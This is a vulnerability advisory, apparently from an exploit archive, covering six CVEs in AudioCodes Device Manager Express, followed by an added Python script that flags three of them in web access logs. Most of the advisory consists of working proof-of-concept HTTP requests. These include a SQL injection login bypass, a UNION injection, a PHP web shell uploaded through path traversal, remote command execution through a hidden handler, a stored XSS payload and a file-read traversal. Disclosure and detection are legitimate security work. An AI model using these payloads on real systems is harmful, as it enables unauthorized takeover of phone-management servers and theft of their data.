Device Manager Express 7.8.20002.47752 SQL Injection / XSS / Code Execution / Traversal

2023.02.24
Credit: Eric Flokstra
Risk: High
Local: No
Remote: Yes

# Product Name: Device Manager Express
# Vendor Homepage: https://www.audiocodes.com
# Software Link: https://www.audiocodes.com/solutions-products/products/management-products-solutions/device-manager
# Version: <= 7.8.20002.47752
# Tested on: Windows 10 / Server 2019
# Default credentials: admin/admin
# CVE-2022-24627, CVE-2022-24628, CVE-2022-24629, CVE-2022-24630, CVE-2022-24631, CVE-2022-24632
# Exploit: https://github.com/00xEF/Audiocodes-Device-Manager-Express

AudioCodes' Device Manager Express features a user interface that enables enterprise network administrators to set up, configure and update up to 500 400HD Series IP phones in globally distributed corporations.

----------------
CVE-2022-24627: An unauthenticated SQL injection exists in the p parameter of the login form.
----------------
POST /admin/AudioCodes_files/process_login.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)
Content-Type: application/x-www-form-urlencoded

username=admin&password=&domain=&p=%5C%27or+1%3D1%23

----------------
CVE-2022-24628: An authenticated SQL injection exists in the id parameter of IPPhoneFirmwareEdit.php
----------------
/admin/AudioCodes_files/IPPhoneFirmwareEdit.php?action=download&id=-1338'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20-

----------------
CVE-2022-24629: A remote code execution vulnerability exists via path traversal in the dir parameter of the file upload functionality.
----------------
POST /admin/AudioCodes_files/BrowseFiles.php?type= HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="dir"

C:/audiocodes/express/WebAdmin/admin/AudioCodes_files/ajax/
-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="type"


-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="myfile"; filename="ajaxJabra.php"
Content-Type: application/x-php

<?php echo shell_exec($_GET['x']); ?>
-----------------------------119140522224988540294045582807
Content-Disposition: form-data; name="Submit"

Upload
-----------------------------119140522224988540294045582807--

----------------
CVE-2022-24630: A remote command execution exists in an undocumented eval function in BrowseFiles.php
----------------
POST /admin/AudioCodes_files/BrowseFiles.php?cmd=ssh HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

ssh_command=dir+C:

----------------
CVE-2022-24631: A Persistent Cross-Site Scripting exists in the desc parameter in ajaxTenants.php
----------------
POST /admin/AudioCodes_files/ajax/ajaxTenants.php HTTP/1.1
Host: 10.11.12.13
".." omitted
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0)

action=save&id=1&name=Default&desc=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(1)%3E&subnet=&isdefault=true

----------------
CVE-2022-24632: A path traversal vulnerability exists in the view parameter of the file download functionality in BrowseFiles.php
----------------
/admin/AudioCodes_files/BrowseFiles.php?view=C:/windows/win.ini
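
The three issues above that are triggered through the query string (CVE-2022-24628, CVE-2022-24630, CVE-2022-24632) leave a trace in the web server access log. The following is an added example, not part of the original advisory or the vendor's code: it flags such requests in combined-format log lines. The log lines are constructed, and ALLOWED_ROOT and the logs/app.log path are assumptions based on the dir value in the upload request.

```python
import ntpath
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: install root, taken from the "dir" value in the upload request above.
ALLOWED_ROOT = "c:\\audiocodes\\express\\"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format), not from a real system.
_P = "/admin/AudioCodes_files/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [24/Feb/2023:10:00:01 +0100] "GET {_P}IPPhoneFirmwareEdit.php?action=download&id=12 HTTP/1.1" 200 5120',
    f'192.0.2.44 - - [24/Feb/2023:10:02:13 +0100] "GET {_P}IPPhoneFirmwareEdit.php?action=download&id=12%27%20OR%201 HTTP/1.1" 200 312',
    f'192.0.2.44 - - [24/Feb/2023:10:02:40 +0100] "POST {_P}BrowseFiles.php?cmd=ssh HTTP/1.1" 200 88',
    f'192.0.2.44 - - [24/Feb/2023:10:03:02 +0100] "GET {_P}BrowseFiles.php?view=C:/audiocodes/express/WebAdmin/../../../windows/win.ini HTTP/1.1" 200 92',
    f'192.0.2.10 - - [24/Feb/2023:10:05:00 +0100] "GET {_P}BrowseFiles.php?view=C:/audiocodes/express/logs/app.log HTTP/1.1" 200 700',
]

def outside_root(path):
    """True if a Windows path, after resolving '..', leaves ALLOWED_ROOT."""
    return not ntpath.normpath(path).lower().startswith(ALLOWED_ROOT)

def classify(line):
    """Return the CVE ids whose request pattern appears in one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    page = url.path.rsplit("/", 1)[-1].lower()
    params = parse_qs(url.query, keep_blank_values=True)  # values are percent-decoded
    hits = []
    if page == "ipphonefirmwareedit.php":
        # id should be a plain integer; quotes, spaces or keywords are suspect
        if any(not (v.isascii() and v.isdigit()) for v in params.get("id", [])):
            hits.append("CVE-2022-24628")
    if page == "browsefiles.php":
        if "ssh" in params.get("cmd", []):  # undocumented command handler
            hits.append("CVE-2022-24630")
        if any(outside_root(v) for v in params.get("view", [])):
            hits.append("CVE-2022-24632")
    return hits

def scan(lines):
    """Map 1-based line number -> matched CVE ids, skipping clean lines."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := classify(line))}

if __name__ == "__main__":
    for n, hits in scan(SAMPLE_LOG).items():
        print(n, hits)
```

The login, upload and tenant requests carry their parameters in the POST body, so catching them needs request-body logging rather than the access log.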

